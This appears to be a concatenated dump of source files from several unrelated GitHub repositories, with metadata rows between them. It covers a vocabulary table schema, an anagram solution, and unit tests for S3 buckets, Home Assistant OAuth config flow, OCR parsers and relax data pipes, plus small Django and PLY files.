'Description',
em.builtin_types['markdown'],
nullok=False,
comment=column_comment['Description'],
),
em.Column.define('Synonyms', em.builtin_types['text[]'], comment=column_comment['Synonyms'],
),
em.Column.define('Owner', em.builtin_types['text'], comment=column_comment['Owner'],
),
]
visible_columns = {
'*': [
'RID', 'Name', 'Description', 'ID', 'URI',
['Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey'],
['Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey'], 'RCT', 'RMT',
['Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey']
]
}
table_display = {'row_name': {'row_markdown_pattern': '{{{Name}}}'}}
table_annotations = {
chaise_tags.table_display: table_display,
chaise_tags.visible_columns: visible_columns,
}
table_comment = 'A set of controlled vocabular terms.'
table_acls = {}
table_acl_bindings = {
'self_service_group': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['Owner'],
'projection_type': 'acl'
},
'self_service_creator': {
'types': ['update', 'delete'],
'scope_acl': ['*'],
'projection': ['RCB'],
'projection_type': 'acl'
}
}
key_defs = [
em.Key.define(
['RID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RIDkey1')],
),
em.Key.define(
['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_IDkey1')],
),
em.Key.define(
['URI'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_URIkey1')],
),
]
fkey_defs = [
em.ForeignKey.define(
['Owner'],
'public',
'Catalog_Group', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_Owner_fkey')],
acls={
'insert': [groups['pdb-curator']],
'update': [groups['pdb-curator']]
},
acl_bindings={
'set_owner': {
'types': ['update', 'insert'],
'scope_acl': ['*'],
'projection': ['ID'],
'projection_type': 'acl'
}
},
),
em.ForeignKey.define(
['RCB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RCB_fkey')],
acls={
'insert': ['*'],
'update': ['*']
},
),
em.ForeignKey.define(
['RMB'],
'public',
'ERMrest_Client', ['ID'],
constraint_names=[('Vocab', 'ihm_external_reference_info_reference_type_term_RMB_fkey')],
acls={
'insert': ['*'],
'update': ['*']
},
),
]
table_def = em.Table.define(
table_name,
column_defs=column_defs,
key_defs=key_defs,
fkey_defs=fkey_defs,
annotations=table_annotations,
acls=table_acls,
acl_bindings=table_acl_bindings,
comment=table_comment,
provide_system=True
)
def main(catalog, mode, replace=False, really=False):
updater = CatalogUpdater(catalog)
table_def['column_annotations'] = column_annotations
table_def['column_comment'] = column_comment
updater.update_table(mode, schema_name, table_def, replace=replace, really=really)
if __name__ == "__main__":
host = 'pdb.isrd.isi.edu'
catalog_id = 1
mode, replace, host, catalog_id = parse_args(host, catalog_id, is_table=True)
catalog = DerivaCatalog(host, catalog_id=catalog_id, validate=False)
main(catalog, mode, replace)
| [
"brinda.vallat@rcsb.org"
] | brinda.vallat@rcsb.org |
97590902ea45bc7e04b8feaeccdb37e092426808 | 3520f9f1b6d804a6d95233493972bf04dca67fb4 | /revisited_2021/math_and_string/valid_anagram.py | 0d690178b7d6f34a5c35933bc51c1c498ce42777 | [] | no_license | Shiv2157k/leet_code | 8691a470148809f0a7077434abdc689f33958f34 | 65cc78b5afa0db064f9fe8f06597e3e120f7363d | refs/heads/master | 2023-06-17T02:59:20.892561 | 2021-07-05T16:42:58 | 2021-07-05T16:42:58 | 266,856,709 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
class Anagram:
def is_valid(self, s: str, t: str):
"""
Approach: Hash Table
Time Complexity: O(N)
Space Complexity: O(1)
:param s:
:param t:
:return:
"""
if len(s) != len(t):
return False
counter = [0] * 26
for i in range(len(s)):
counter[ord(s[i]) - ord("a")] += 1
counter[ord(t[i]) - ord("a")] -= 1
for count in counter:
if count != 0:
return False
return True
if __name__ == "__main__":
anagram = Anagram()
print(anagram.is_valid("rat", "tar"))
print(anagram.is_valid("", ""))
print(anagram.is_valid("a", "b")) | [
"shiv2157.k@gmail.com"
] | shiv2157.k@gmail.com |
218920ee7ecdcf630aa9ccd3a3b4fddcfa2ffa7e | 5608a9cd3bec8cab1c3f9d7f42896107b78593cc | /tests/unit/core/providers/aws/s3/test_bucket.py | f85370b5252ce422d7ef0108365dfc1490f475ea | [
"Apache-2.0"
] | permissive | troyready/runway | cdee6d94f42173c8aa0bd414620b68be36a510aa | 4fd299961a4b73df39e14f4f19a7236f7be17dd8 | refs/heads/master | 2021-06-18T16:05:30.712211 | 2021-01-14T01:44:32 | 2021-01-14T01:44:32 | 151,314,626 | 0 | 0 | Apache-2.0 | 2018-10-02T19:55:09 | 2018-10-02T19:55:08 | null | UTF-8 | Python | false | false | 8,634 | py | """Test runway.core.providers.aws.s3._bucket."""
# pylint: disable=no-self-use
import logging
from mock import MagicMock
from runway.core.providers.aws import BaseResponse
from runway.core.providers.aws.s3 import Bucket
from runway.http_backport import HTTPStatus
MODULE = "runway.core.providers.aws.s3._bucket"
class TestBucket(object):
"""Test runway.core.providers.aws.s3._bucket.Bucket."""
def test_client(self):
"""Test client."""
mock_ctx = MagicMock()
mock_session = MagicMock()
mock_client = MagicMock()
mock_ctx.get_session.return_value = mock_session
mock_session.client.return_value = mock_client
bucket = Bucket(mock_ctx, "test-bucket", region="us-west-2")
assert bucket.client == mock_client
mock_ctx.get_session.assert_called_once_with(region="us-west-2")
mock_session.client.assert_called_once_with("s3")
def test_create(self, runway_context):
"""Test create."""
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
stubber.add_client_error(
"head_bucket",
"NoSuchBucket",
"Not Found",
404,
expected_params={"Bucket": "test-bucket"},
)
stubber.add_response(
"create_bucket",
{"Location": "us-east-1"},
{"ACL": "private", "Bucket": "test-bucket"},
)
with stubber:
assert bucket.create(ACL="private")
stubber.assert_no_pending_responses()
def test_create_exists(self, caplog, runway_context):
"""Test create with exists=True."""
caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
stubber = runway_context.add_stubber("s3", region="us-west-2")
bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
stubber.add_response(
"head_bucket",
{"ResponseMetadata": {"HostId": "test", "HTTPStatusCode": 200}},
{"Bucket": "test-bucket"},
)
with stubber:
assert not bucket.create()
stubber.assert_no_pending_responses()
assert "bucket already exists" in "\n".join(caplog.messages)
def test_create_forbidden(self, caplog, runway_context):
"""Test create with forbidden=True."""
caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
stubber = runway_context.add_stubber("s3", region="us-west-2")
bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
stubber.add_client_error(
"head_bucket",
"AccessDenied",
"Forbidden",
403,
expected_params={"Bucket": "test-bucket"},
)
with stubber:
assert not bucket.create()
stubber.assert_no_pending_responses()
assert "access denied" in "\n".join(caplog.messages)
def test_create_us_west_2(self, runway_context):
"""Test create with region=us-west-2."""
stubber = runway_context.add_stubber("s3", region="us-west-2")
bucket = Bucket(runway_context, "test-bucket", region="us-west-2")
stubber.add_client_error(
"head_bucket",
"NoSuchBucket",
"The specified bucket does not exist.",
404,
expected_params={"Bucket": "test-bucket"},
)
stubber.add_response(
"create_bucket",
{"Location": "us-east-1"},
{
"Bucket": "test-bucket",
"CreateBucketConfiguration": {"LocationConstraint": "us-west-2"},
},
)
with stubber:
assert bucket.create()
stubber.assert_no_pending_responses()
def test_enable_versioning(self, runway_context):
"""Test enable_versioning."""
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
stubber.add_response(
"get_bucket_versioning",
{"Status": "Suspended", "MFADelete": "Enabled"},
{"Bucket": "test-bucket"},
)
stubber.add_response(
"put_bucket_versioning",
{},
{
"Bucket": "test-bucket",
"VersioningConfiguration": {
"Status": "Enabled",
"MFADelete": "Enabled",
},
},
)
with stubber:
bucket.enable_versioning()
stubber.assert_no_pending_responses()
def test_enable_versioning_skipped(self, caplog, runway_context):
"""Test enable_versioning with Status=Enabled."""
caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
stubber.add_response(
"get_bucket_versioning", {"Status": "Enabled"}, {"Bucket": "test-bucket"},
)
with stubber:
bucket.enable_versioning()
stubber.assert_no_pending_responses()
assert (
'did not modify versioning policy for bucket "test-bucket"; already enabled'
) in caplog.messages
def test_exists(self, monkeypatch, runway_context):
"""Test not_found."""
mock_head = MagicMock(spec=BaseResponse())
monkeypatch.setattr(Bucket, "head", mock_head)
bucket = Bucket(runway_context, "test-bucket")
mock_head.metadata.not_found = True
assert not bucket.exists # initial value
mock_head.metadata.not_found = False
assert not bucket.exists # cached value
del bucket.not_found
assert bucket.exists # updated value
def test_forbidden(self, monkeypatch, runway_context):
"""Test forbidden."""
mock_head = MagicMock(spec=BaseResponse())
monkeypatch.setattr(Bucket, "head", mock_head)
bucket = Bucket(runway_context, "test-bucket")
mock_head.metadata.forbidden = True
assert bucket.forbidden # initial value
mock_head.metadata.forbidden = False
assert bucket.forbidden # cached value
del bucket.forbidden
assert not bucket.forbidden # updated value
def test_get_versioning(self, runway_context):
"""Test get_versioning."""
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
response = {"Status": "Enabled", "MFADelete": "Enabled"}
stubber.add_response(
"get_bucket_versioning", response, {"Bucket": "test-bucket"}
)
with stubber:
assert bucket.get_versioning() == response
stubber.assert_no_pending_responses()
def test_head(self, runway_context):
"""Test head."""
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
stubber.add_response(
"head_bucket",
{"ResponseMetadata": {"HostId": "test", "HTTPStatusCode": 200}},
{"Bucket": "test-bucket"},
)
with stubber:
assert bucket.head.metadata.host_id == "test"
assert bucket.head.metadata.http_status_code == HTTPStatus.OK
stubber.assert_no_pending_responses()
def test_head_clienterror(self, caplog, runway_context):
"""Test head with ClientError."""
caplog.set_level(logging.DEBUG, logger="runway.core.providers.aws.s3.bucket")
stubber = runway_context.add_stubber("s3")
bucket = Bucket(runway_context, "test-bucket")
stubber.add_client_error(
"head_bucket",
"AccessDenied",
"Forbidden",
403,
expected_params={"Bucket": "test-bucket"},
)
with stubber:
assert bucket.head.metadata.http_status_code == HTTPStatus.FORBIDDEN
stubber.assert_no_pending_responses()
assert "received an error from AWS S3" in "\n".join(caplog.messages)
def test_not_found(self, monkeypatch, runway_context):
"""Test not_found."""
mock_head = MagicMock(spec=BaseResponse())
monkeypatch.setattr(Bucket, "head", mock_head)
bucket = Bucket(runway_context, "test-bucket")
mock_head.metadata.not_found = True
assert bucket.not_found # initial value
mock_head.metadata.not_found = False
assert bucket.not_found # cached value
del bucket.not_found
assert not bucket.not_found # updated value
| [
"kyle@finley.sh"
] | kyle@finley.sh |
c0d577a00e14252c2e94df73db2729d4a5836254 | 5963c12367490ffc01c9905c028d1d5480078dec | /tests/components/home_plus_control/test_config_flow.py | 4a7dbd3d3ee4e3f02c6a53aa014845151bec6ce1 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 6,431 | py | """Test the Legrand Home+ Control config flow."""
from unittest.mock import patch
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.components.home_plus_control.const import (
CONF_SUBSCRIPTION_KEY,
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_CLIENT_SECRET
from homeassistant.helpers import config_entry_oauth2_flow
from tests.common import MockConfigEntry
from tests.components.home_plus_control.conftest import (
CLIENT_ID,
CLIENT_SECRET,
SUBSCRIPTION_KEY,
)
async def test_full_flow(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check full flow."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": 60,
},
)
with patch(
"homeassistant.components.home_plus_control.async_setup_entry",
return_value=True,
) as mock_setup:
result = await hass.config_entries.flow.async_configure(result["flow_id"])
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "Home+ Control"
config_data = result["data"]
assert config_data["token"]["refresh_token"] == "mock-refresh-token"
assert config_data["token"]["access_token"] == "mock-access-token"
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert len(mock_setup.mock_calls) == 1
async def test_abort_if_entry_in_progress(hass, current_request_with_host):
"""Check flow abort when an entry is already in progress."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
# Start one flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
# Attempt to start another flow
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_in_progress"
async def test_abort_if_entry_exists(hass, current_request_with_host):
"""Check flow abort when an entry already exists."""
existing_entry = MockConfigEntry(domain=DOMAIN)
existing_entry.add_to_hass(hass)
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
"http": {},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "single_instance_allowed"
async def test_abort_if_invalid_token(
hass, aiohttp_client, aioclient_mock, current_request_with_host
):
"""Check flow abort when the token has an invalid value."""
assert await setup.async_setup_component(
hass,
"home_plus_control",
{
"home_plus_control": {
CONF_CLIENT_ID: CLIENT_ID,
CONF_CLIENT_SECRET: CLIENT_SECRET,
CONF_SUBSCRIPTION_KEY: SUBSCRIPTION_KEY,
},
},
)
result = await hass.config_entries.flow.async_init(
"home_plus_control", context={"source": config_entries.SOURCE_USER}
)
state = config_entry_oauth2_flow._encode_jwt( # pylint: disable=protected-access
hass,
{
"flow_id": result["flow_id"],
"redirect_uri": "https://example.com/auth/external/callback",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_EXTERNAL_STEP
assert result["step_id"] == "auth"
assert result["url"] == (
f"{OAUTH2_AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
"&redirect_uri=https://example.com/auth/external/callback"
f"&state={state}"
)
client = await aiohttp_client(hass.http.app)
resp = await client.get(f"/auth/external/callback?code=abcd&state={state}")
assert resp.status == 200
assert resp.headers["content-type"] == "text/html; charset=utf-8"
aioclient_mock.post(
OAUTH2_TOKEN,
json={
"refresh_token": "mock-refresh-token",
"access_token": "mock-access-token",
"type": "Bearer",
"expires_in": "non-integer",
},
)
result = await hass.config_entries.flow.async_configure(result["flow_id"])
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "oauth_error"
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
64ab6dc9d426016042fc73847036810389e9d621 | 1f244254465ce36f116b7d1c255f9a9ae9594bb4 | /typeidea/typeidea/wsgi.py | 859bfc426728341b7d6955eef2c8ef45d9865831 | [] | no_license | sunye088/typeidea | a45e7093b3b553fd38a5a6ba1971a7e3651cb161 | 2b84392e926fd72b1975947626db7362f0729a5c | refs/heads/master | 2023-04-29T15:20:18.049406 | 2019-11-30T13:31:39 | 2019-11-30T13:31:39 | 226,258,490 | 0 | 0 | null | 2023-04-21T20:41:54 | 2019-12-06T06:10:25 | Python | UTF-8 | Python | false | false | 532 | py | """
WSGI config for typeidea project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'typeidea.settings')
profile =os.environ.get('TYPEIDEA_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "typeidea.settings.%s" % profile)
application = get_wsgi_application()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
cedff764c6d15c2ce22525b3220ee19a35077ac5 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13033.py | 8a6142db23b900da6715c215e263e247e680ca0f | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | # How to get POST variables in Python, when using gevent?
environ['wsgi.input'].read()
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
4bc76b786fe6931ca452ac6acf19df76b08600dd | 2898e585a2396738e49e33d322e8c65c823e6cf8 | /content/migrations/0073_comment.py | 0db929fda7cd4c263f7df602e0253eea7adf4179 | [] | no_license | kshutashvili/carshops | 4a4f384856c7cae6d09c9ca6e8b6c703ab88be80 | 885c6ed85d33c1cc9333ef9d224a3000b08959dc | refs/heads/master | 2022-12-12T12:50:49.618195 | 2018-02-22T18:04:00 | 2018-02-22T18:04:00 | 203,865,092 | 0 | 0 | null | 2022-11-22T02:24:12 | 2019-08-22T20:06:14 | JavaScript | UTF-8 | Python | false | false | 2,007 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-21 15:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('content', '0072_auto_20180220_1531'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='\u0418\u043c\u044f \u0442\u043e\u0433\u043e, \u043a\u0442\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('date', models.DateField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430')),
('content', models.TextField(verbose_name='\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='subitems', to='content.Comment', verbose_name='\u0420\u043e\u0434\u0438\u0442\u0435\u043b\u044c')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='content.Product', verbose_name='\u0422\u043e\u0432\u0430\u0440')),
],
options={
'verbose_name': '\u041e\u0442\u0437\u044b\u0432',
'verbose_name_plural': '\u041e\u0442\u0437\u044b\u0432\u044b',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
c6f06eb98d128fd78f6d7854db6a54d8e17d525b | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tests/test_datasets/test_preparers/test_parsers/test_wildreceipt_parsers.py | f4e5510db441116c73cc4881d23d270c83338ff1 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright (c) OpenMMLab. All rights reserved.
import json
import os.path as osp
import tempfile
import unittest
from mmocr.datasets.preparers.parsers.wildreceipt_parser import (
WildreceiptKIEAnnParser, WildreceiptTextDetAnnParser)
from mmocr.utils import list_to_file
class TestWildReceiptParsers(unittest.TestCase):
def setUp(self) -> None:
self.root = tempfile.TemporaryDirectory()
fake_sample = dict(
file_name='test.jpg',
height=100,
width=100,
annotations=[
dict(
box=[
550.0, 190.0, 937.0, 190.0, 937.0, 104.0, 550.0, 104.0
],
text='test',
label=1,
),
dict(
box=[
1048.0, 211.0, 1074.0, 211.0, 1074.0, 196.0, 1048.0,
196.0
],
text='ATOREMGRTOMMILAZZO',
label=0,
)
])
fake_sample = [json.dumps(fake_sample)]
self.anno = osp.join(self.root.name, 'wildreceipt.txt')
list_to_file(self.anno, fake_sample)
def test_textdet_parsers(self):
parser = WildreceiptTextDetAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
self.assertEqual(osp.basename(samples[0][0]), 'test.jpg')
instances = samples[0][1]
self.assertEqual(len(instances), 2)
self.assertIn('poly', instances[0])
self.assertIn('text', instances[0])
self.assertIn('ignore', instances[0])
self.assertEqual(instances[0]['text'], 'test')
self.assertEqual(instances[1]['ignore'], True)
def test_kie_parsers(self):
parser = WildreceiptKIEAnnParser(self.root.name)
samples = parser.parse_files(self.anno, 'train')
self.assertEqual(len(samples), 1)
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
733bd03e660fcd79cb70a76ffa9a75004ae3605a | 6858cbebface7beec57e60b19621120da5020a48 | /ply/comment.py | 93db508a01fa2d7c64d4b2e5db56e7acd82ef5a0 | [] | no_license | ponyatov/PLAI | a68b712d9ef85a283e35f9688068b392d3d51cb2 | 6bb25422c68c4c7717b6f0d3ceb026a520e7a0a2 | refs/heads/master | 2020-09-17T01:52:52.066085 | 2017-03-28T07:07:30 | 2017-03-28T07:07:30 | 66,084,244 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | def t_COMMENT(t):
r'\#.*'
pass
# No return value. Token discarded | [
"dponyatov@gmail.com"
] | dponyatov@gmail.com |
2bb760da30a8595078e7478130aaa509aa687334 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /test_suite/unit_tests/_pipe_control/test_pipes.py | 19956b94af0d81e497f8ddcfe27054bd39176ce1 | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,472 | py | ###############################################################################
# #
# Copyright (C) 2007-2014 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from pipe_control import pipes
from pipe_control.reset import reset
from lib.errors import RelaxError, RelaxNoPipeError, RelaxPipeError
from test_suite.unit_tests.base_classes import UnitTestCase
class Test_pipes(UnitTestCase):
"""Unit tests for the functions of the 'pipe_control.pipes' module."""
def setUp(self):
"""Set up for all the data pipe unit tests."""
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Add a single object to the 'orig' data pipe.
ds['orig'].x = 1
# Add a single object to the single spin system of the 'orig' data pipe.
ds['orig'].mol[0].res[0].spin[0].num = 1
# Add an empty data pipe (for the 'eliminate_unused_pipes' test).
ds.add(pipe_name='empty', pipe_type='mf')
# Set the current pipe to the 'orig' data pipe.
pipes.switch('orig')
def test_copy(self):
"""Test the copying of a data pipe.
The function tested is pipe_control.pipes.copy().
"""
# Copy the 'orig' data pipe to the 'new' data pipe.
pipes.copy('orig', 'new')
# Test that the new data pipe exists.
self.assert_('new' in ds)
# Test that the new data pipe has the object 'x' and that its value is 1.
self.assertEqual(ds['new'].x, 1)
# Change the value of x.
ds['new'].x = 2
# Test that the two values are different.
self.assert_(ds['orig'].x != ds['new'].x)
# Test that the new data pipe has the object 'mol[0].res[0].spin[0].num' and that its value is 1.
self.assertEqual(ds['new'].mol[0].res[0].spin[0].num, 1)
# Change the spin system number.
ds['new'].mol[0].res[0].spin[0].num = 2
# Test that the original spin system number hasn't changed.
self.assertEqual(ds['orig'].mol[0].res[0].spin[0].num, 1)
def test_copy_current(self):
"""Test the copying of current data pipe.
The function tested is pipe_control.pipes.copy().
"""
# Copy the 'orig' data pipe to the 'new' data pipe.
pipes.copy(pipe_to='new')
# Test that the new data pipe exists.
self.assert_('new' in ds)
# Test that the new data pipe has the object 'x' and that its value is 1.
self.assertEqual(ds['new'].x, 1)
# Change the value of x.
ds['new'].x = 2
# Test that the two values are different.
self.assert_(ds['orig'].x != ds['new'].x)
# Test that the new data pipe has the object 'mol[0].res[0].spin[0].num' and that its value is 1.
self.assertEqual(ds['new'].mol[0].res[0].spin[0].num, 1)
# Change the spin system number.
ds['new'].mol[0].res[0].spin[0].num = 2
# Test that the original spin system number hasn't changed.
self.assertEqual(ds['orig'].mol[0].res[0].spin[0].num, 1)
def test_copy_fail(self):
"""Test the failure of the copying of data pipes when the data pipe to copy to already exists.
The function tested is pipe_control.pipes.copy()
"""
# Assert that a RelaxPipeError occurs when the data pipe to copy data to already exists.
self.assertRaises(RelaxPipeError, pipes.copy, 'orig', 'empty')
def test_creation(self):
"""Test the creation of a data pipe.
The function used is pipe_control.pipes.create().
"""
# Create a new model-free data pipe.
name = 'new'
pipes.create(name, 'mf')
# Test that the data pipe exists.
self.assert_(name in ds)
# Test that the current pipe is the new pipe.
self.assertEqual(pipes.cdp_name(), name)
def test_creation_fail(self):
"""Test the failure of the creation of a data pipe (by supplying an incorrect pipe type).
The function used is pipe_control.pipes.create().
"""
# Assert that a RelaxError occurs when the pipe type is invalid.
self.assertRaises(RelaxError, pipes.create, 'new', 'x')
def test_current(self):
"""Get the current data pipe.
The function used is pipe_control.pipes.cdp_name().
"""
# Test the current pipe.
self.assertEqual(pipes.cdp_name(), 'orig')
def test_deletion(self):
"""Test the deletion of a data pipe.
The function tested is pipe_control.pipes.delete()
"""
# Set the current pipe to the 'orig' data pipe.
name = 'orig'
pipes.switch(name)
# Delete the 'orig' data pipe.
pipes.delete(name)
# Test that the data pipe no longer exists.
self.assert_(name not in ds)
# Test that the current pipe is None (as the current pipe was deleted).
self.assertEqual(pipes.cdp_name(), None)
def test_deletion_fail(self):
"""Test the failure of the deletion of a data pipe (by suppling a non-existant data pipe).
The function tested is pipe_control.pipes.delete()
"""
# Assert that a RelaxNoPipeError occurs when the data pipe does not exist.
self.assertRaises(RelaxNoPipeError, pipes.delete, 'x')
def test_switch(self):
"""Test the switching of the current data pipe.
The function tested is pipe_control.pipes.switch().
"""
# Switch to the 'orig' data pipe.
pipes.switch('orig')
# Test the current data pipe.
self.assertEqual(pipes.cdp_name(), 'orig')
# Switch to the 'empty' data pipe.
pipes.switch('empty')
# Test the current data pipe.
self.assertEqual(pipes.cdp_name(), 'empty')
def test_switch_fail(self):
"""Test the failure of switching to a non-existant data pipe.
The function used is pipe_control.pipes.switch().
"""
# Assert that a RelaxNoPipeError occurs when the pipe type is invalid.
self.assertRaises(RelaxNoPipeError, pipes.switch, 'x')
def test_test(self):
"""The throwing of RelaxNoPipeError when the pipe does not exist.
The function tested is pipe_control.pipes.check_pipe().
"""
# The following should do nothing as the pipes exist.
pipes.check_pipe()
pipes.check_pipe('orig')
pipes.check_pipe('empty')
# Assert that a RelaxNoPipeError occurs when the pipe doesn't exist.
self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'x')
# Reset relax.
reset()
# Now none of the following pipes exist, hence errors should be thrown.
